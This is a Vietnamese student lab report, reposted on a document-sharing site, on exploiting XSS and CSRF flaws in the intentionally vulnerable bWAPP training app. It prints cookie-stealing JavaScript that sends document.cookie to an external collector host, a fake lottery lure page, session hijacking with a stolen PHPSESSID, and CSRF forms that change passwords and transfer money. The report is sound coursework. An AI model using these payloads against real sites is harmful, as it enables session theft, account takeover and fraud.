Khai thác lỗ hổng CSRF và XSS trên BWAP

34 134 0
Khai thác lỗ hổng CSRF và XSS trên BWAP

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

Bước 1: Hacker tạo file đánh cắp cookie có tên là get.phpFile này có nhiệm vụ đánh cắp cookie của victim và ghi thông tin vào file có tên cookie.txtBước 2: Upload các file lên host.Hacker up lên host của chúng 2 file get.php và cookie.txt. Trong đó file get.php có nội dung như trên và file get.txt là file rỗng để lưu trữ toàn bộ thông tin của victim được gửi về cho hacker thông qua mệnh lệnh được đưa ra từ file get.php.Giả sử up 2 file lên (Ta đặt tên cho link này là KH_XSS) : http:192.168.1.8NguyenThiKimHueXSS4Bước 3: Khai thác lỗ hổng XSSTạo đoạn mã java script ăn cắp cookies có dạng như sau:(Ta đặt tên đoạn code này là KH_OPEN)window.open(http:192.168.1.8NguyenThiKimHueXSSget.php?cookie=+ document.cookie)Giả sử site chứa lỗi XSS giao diện như sau : Chèn đoạn mã vào site như sau:5http:192.168.1.8NguyenThiKimhuebwappbwappxss_get.php?firstname=window.open(http:192.168.1.8NguyenThiKimHueXSSget.php?cookie=+ document.cookie)lastname=Aform=submitHacker tạo 1 trang web đơn giản như sau :LotteryCONGRATULATIONSYOU WONClick this linkto see your prize6Sau khi victim click vào ”Link” cookie của nạn nhân sẽ được gửi về file cookie.txt của hacker.Ví dụ cookie trong trường hợp trên là dãy kí tự sau PHPSESSID :

BAN CƠ YẾU CHÍNH PHỦ HỌC VIỆN KỸ THUẬT MẬT Mà ¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯ BÀI THỰC HÀNH SỐ Thực hành khai thác lỗ hổng ứng dụng web bwapp Sinh viên thực hiện: Nguyễn Thị Kim Huế AT13CLC0110 Giảng viên: Tiến Sĩ: Vũ Thị Vân Khoa An tồn thơng tin – Học viện kỹ thuật mật mã Hà Nội, 2019 Contents CHƯƠNG 1: KỸ THUẬT TẤN CÔNG XSS Kỹ thuật lấy Cookie từ site có chứa lỗi XSS level low Sử dụng cookie để đăng nhập 1.1 Thực hành công XSS phản xạ sử dụng phương thức GET mức độ dễ 1.2 Thực hành công XSS phản xạ sử dụng phương thức GET mức độ trung bình 10 Kỹ thuật lấy Cookie từ site có chứa lỗi XSS level medium 11 1.4 Thực hành công XSS phản xạ sử dụng phương thức POST mức trung bình 15 1.5 Thực hành công XSS phản xạ sử dụng chuỗi JSON mức dễ 18 Chèn vào phần “search for a movie” đoạn code sau : 20 1.6 Thực hành cơng XSS phản xạ sử dụng thuộc tính HREF mực độ dễ 21 1.7 Thực hành công XSS phản xạ sử dụng hàm EVAL mức độ dễ 22 1.8 Thực hành công XSS lưu trữ dạng Blog mức độ dễ 25 CHƯƠNG KỸ THUẬT TẤN CÔNG CSRF 28 2.1 Thực hành công CSRF (Change Password) mức độ dễ 28 2.2 Thực hành công CSRF (Transfer Amount) mức độ dễ 32 CHƯƠNG 1: KỸ THUẬT TẤN CÔNG XSS Kỹ thuật lấy Cookie từ site có chứa lỗi XSS level low Bước 1: Hacker tạo file đánh cắp cookie có tên get.php File có nhiệm vụ đánh cắp cookie victim ghi thông tin vào file có tên cookie.txt Bước 2: Upload file lên host Hacker up lên host chúng file get.php cookie.txt Trong file get.php có nội dung file get.txt file rỗng để lưu trữ toàn thông tin victim gửi cho hacker thông qua mệnh lệnh đưa từ file get.php Giả sử up file lên (Ta đặt tên cho link KH_XSS) : http://192.168.1.8/NguyenThiKimHue/XSS/ Bước 3: Khai thác lỗ hổng XSS Tạo đoạn mã java script ăn cắp cookies có dạng sau:(Ta đặt tên đoạn code KH_OPEN) window.open("http://192.168.1.8/NguyenThiKimHue/XSS/get.php?cook ie="+ document.cookie) Giả sử site chứa lỗi XSS giao diện sau : Chèn đoạn mã vào site sau: http://192.168.1.8/NguyenThiKimhue/bwapp/bwapp/xss_get.php?firstname=window.open('http://192.168.1.8/NguyenThiKimHue/XSS/get.php?cookie='+ document.cookie)&lastname=A&form=submit Hacker tạo trang web đơn giản sau : Lottery CONGRATULATIONS!!! YOU WON!!! Click this link to see your prize Sau victim click vào ”Link” cookie nạn nhân gửi file cookie.txt hacker Ví dụ cookie trường hợp dãy kí tự sau PHPSESSID : cqv1iuje8h7btohkebmpnh20pn Sử dụng cookie để đăng nhập Hacker mở trình duyệt lên dùng cookie lấy đăng nhập thông qua tiện ích trình duyệt Chrome: EditThisCookie Add đoạn cookie lấy vào sau F5 lại trang login Vậy sử dụng cookie login thành công mà không cần biết user password người dùng 1.1 Thực hành công XSS phản xạ sử dụng phương thức GET mức độ dễ Sau đăng nhập vào bWAPP chọn đến XSS - Reflected (GET) level low : XSS- Reflected ảnh hưởng phía client XSS - Reflected (GET) sử dụng phương thức GET, tức nhập liệu gửi từ phía client lên server URL kèm theo liệu Xác định lỗi XSS: Quan sát thấy có First name Last name cho phép truyền liệu vào Ta thử nhập liệu vào xem kết hiển thị Kết trả hiển thị ‘ Welcome Nguyễn Thị Kim Huế Từ xác định có khả bị dính lỗi XSS Do hoạt động theo phương thức GET nên thấy liệu truyền kèm theo URL sau : http://192.168.1.8/Nguyen_Thi_Kim_Hue/bWAPP/bWAPP/xss_get.php?firstnam e=Nguy%E1%BB%85n+Th%E1%BB%8B+Kim&lastname=Hu%E1%BA%BF &form=submit Kiểm tra lỗi XSS: Kiểm tra cách thử truyền vào đoạn mã java script alert("XSS") để thực tạo popup thông báo để kiểm tra xem site có bị lỗi XSS hay khơng Kết : Kết cho thấy trang web bị dính lỗi CSRF Khai thác lỗi XSS: Kỹ thuật lấy cookie level low here Sử dụng cookie để đăng nhập here 1.2 Thực hành công XSS phản xạ sử dụng phương thức GET mức độ trung bình Chọn XSS - Reflected (GET) level medium Xác định lỗi XSS Truyền đoạn mã java script để thực tạo popup thông báo để kiểm tra xem site có bị lỗi XSS hay khơng? Tại level không hiển thị popup level low Ta view source code lên xem : 10 Khai thác lỗi XSS Chèn vào phần “search for a movie” đoạn code sau : "}]}';window.open("http://192.168.1.8/NguyenThiKimHue/XSS/get.php ?cookie="+ document.cookie) Sau ta thu cookie gửi file cookie.txt Sử dụng cookie login here 20 1.6 Thực hành công XSS phản xạ sử dụng thuộc tính HREF mực độ dễ Login vào bWAPP chọn XSS - Reflected (HREF) level low Quan sát giao diện site ta thấy có trường cho phép nhập chuỗi kí tự sau : 21 1.7 Thực hành công XSS phản xạ sử dụng hàm EVAL mức độ dễ Login vào bWAPP chọn XSS - Reflected (Eval) level low Xác định lỗi XSS Quan sát giao diện sau truy cập vào trang ta thấy hiển thị sau : Ctr+U để view source code : 22 Ta để ý thấy có hàm đoạn java script: eval("document.write(Date())"); Hàm eval JavaScript dùng để biến chuỗi thành biểu thức tính tốn mã lệnh JavaScript Ở hàm eval lấy giá trị Date() hiển thị hình Giá trị Date() thị ngày máy user Ngoài ta quan sát URL , sử dụng phương thức GET sau : Suy site bị dính lỗi XSS hàm Eval Kiểm tra lỗi XSS Thay hiển thị giá trị Date() ta thử popup cách thay giá trị Date() alert('kimhue') 23 Kết luận site bị dính lỗi XSS Khai thác lỗi XSS Thực tương tự here 24 1.8 Thực hành công XSS lưu trữ dạng Blog mức độ dễ Login vào bWAPP chọn XSS - Stored (Blog) level low: Stored - XSS lỗi XSS mà đoạn mã chèn thêm vào lưu trữ server, CSDL dạng comment blog, message forum visitor log Xác định lỗi XSS Quan sát giao diện hiển thị sau: Xác định vị trí có khả xảy lỗi XSS ô nhập entry, ta thử nhập giá trị vào xem kết trả sau : 25 Từ xác định khả bị dính lỗi XSS ‘Submit’ Kiểm tra lỗi XSS Thử truyền vào đoạn mã java script alert("KimHueNt") để thực tạo popup thơng báo để kiểm tra xem site có bị lỗi XSS hay không? Kết : Suy site bị dính lỗi XSS Khai thác lỗi XSS Kỹ thuật lấy cookie here Thực tương tự here khác chỗ đoạn java cript có nhiệm cụ đánh cắp cookie người dùng lưu trữ server Sau chèn đoạn mã java script gửi lên server window.open("https://at13clc01.000webhostapp.com/get.php?cookie="+ document.cookie) 26 Đoạn java script thực Ở ví dụ đăng nhập tài khoản khác truy cập đến XSS - Stored (Blog), tự động cookie user gửi cho hacker Từ cookie có mà hacker login vào account victim mà không cần biết User password Logout khỏi bWAPP: Đăng nhập lại quan sát trang tự động chuyển tới : https://at13clc01.000webhostapp.com/get.php?cookie=SL_G_WPT_TO=vi;%20S L_GWPT_Show_Hide_tmp=1;%20SL_wptGlobTipTmp=1;%20security_level=0; %20PHPSESSID=52uen2mkkuvla6f6fjl5hbj40n Từ cookie lấy hacker sử dụng cookie để đăng nhập mà cần biết user password người dùng 27 CHƯƠNG KỸ THUẬT TẤN CƠNG CSRF 2.1 Thực hành cơng CSRF (Change Password) mức độ dễ Sau đăng nhập vào bWAPP chọn CSRF (Change Password): Hình 2.1 Chọn CSRF (Change Password) Chọn level low: Hình 2.2 Chọn level low CSRF (Change Password) Xác định lỗi CSRF Thiết lập proxy Burp Suite chế độ ‘Intercept is on’: Hình 2.3 Thiết lập proxy Burp Suite chế độ ‘Intercept is on’ Nhập vào ô new password để thay đổi password: 28 Hình 2.4 Giao diện thực cơng CSRF CSRF (Change Password) level low Nhấn Change xem thơng tin thu proxy: Hình 2.5 Phương thức GET sử dụng CSRF (Change Password) level low Mở source code có chứa form thay đổi mật sau: Hình 2.6 Form thay đổi mật CSRF (Change Password) level low 29 Copy đoạn HTML tạo file HTML có filename “CSRF_CP_L” thêm giá trị value=”123456” (trong “123456” mật muốn ta thay đổi) : Hình 2.7 Tạo file html CSRF (Change Password) level low Trong file html hacker thay đổi mật tùy theo ý muốn hacker, gửi file cho victim lừa click vào Hình 2.8 File html gửi cho victim CSRF (Change Password) level low Sau người dùng kick vào “Change” mật thay đổi 30 Hình 2.9 Kết sau khai thác lỗi CSRF (Change Pasword) level low Từ hacker login vào tài khoản người dùng với mật đổi theo ý hacker 31 2.2 Thực hành công CSRF (Transfer Amount) mức độ dễ Sau đăng nhập vào bWAPP chọn CSRF Transfer Amount level low: Xác định lỗi CSRF: Nhập vào ô “Amount to transfer” giá trị sau: Click “Transfer” button quan sát trường “Amount on your account :” có giá trị giảm cịn 900 EUR Quan sát URL hiển thị account chuyển tiền đến số tiền gửi 100 sau : 32 http://192.168.1.8/Nguyen_Thi_Kim_Hue/bWAPP/bWAPP/csrf_2.php?account= 123-45678-90&amount=100&action=transfer Từ thấy trang web bị lỗi CSRF Thực công cách tạo trang html chèn thẻ có src đến địa URL tương tự URL chuyển tiền thành công bên : Trong thẻ ”account=999-888-777” tài khoản mà hacker chuyển tiền đến “amount=500” số tiền mà hacker chuyển Sau victim login trang web thành cơng hacker gửi link trang website chứa thẻ cho victim Khi victim click vào link độc số tiền tài khoản victim chuyển đế.n tài khoản mà tên hacker mong muốn phiên làm việc victim Như đoạn code đơn giản kết hợp với kỹ nghệ xã hội , hacker chuyển tiền tới tài khoản chúng muốn cách dễ dàng 33 34 ... low: Xác định lỗi XSS Quan sát vị trí xảy lỗi XSS ta có tìm kiếm : Nhập vào chuỗi bất kì: Kêt trả chuỗi kí tự mà ta nhập vào “AntMan” Có thể site có lỗi XSS Kiểm tra lỗi XSS 18 Truyền vào đoạn mã... site bị dính lỗi XSS hàm Eval Kiểm tra lỗi XSS Thay hiển thị giá trị Date() ta thử popup cách thay giá trị Date() alert('kimhue') 23 Kết luận site bị dính lỗi XSS Khai thác lỗi XSS Thực tương... site có bị lỗi XSS hay khơng Kết : Kết cho thấy trang web bị dính lỗi CSRF Khai thác lỗi XSS: Kỹ thuật lấy cookie level low here Sử dụng cookie để đăng nhập here 1.2 Thực hành công XSS phản xạ

Ngày đăng: 08/06/2021, 15:00

Từ khóa liên quan

Tài liệu cùng người dùng

Tài liệu liên quan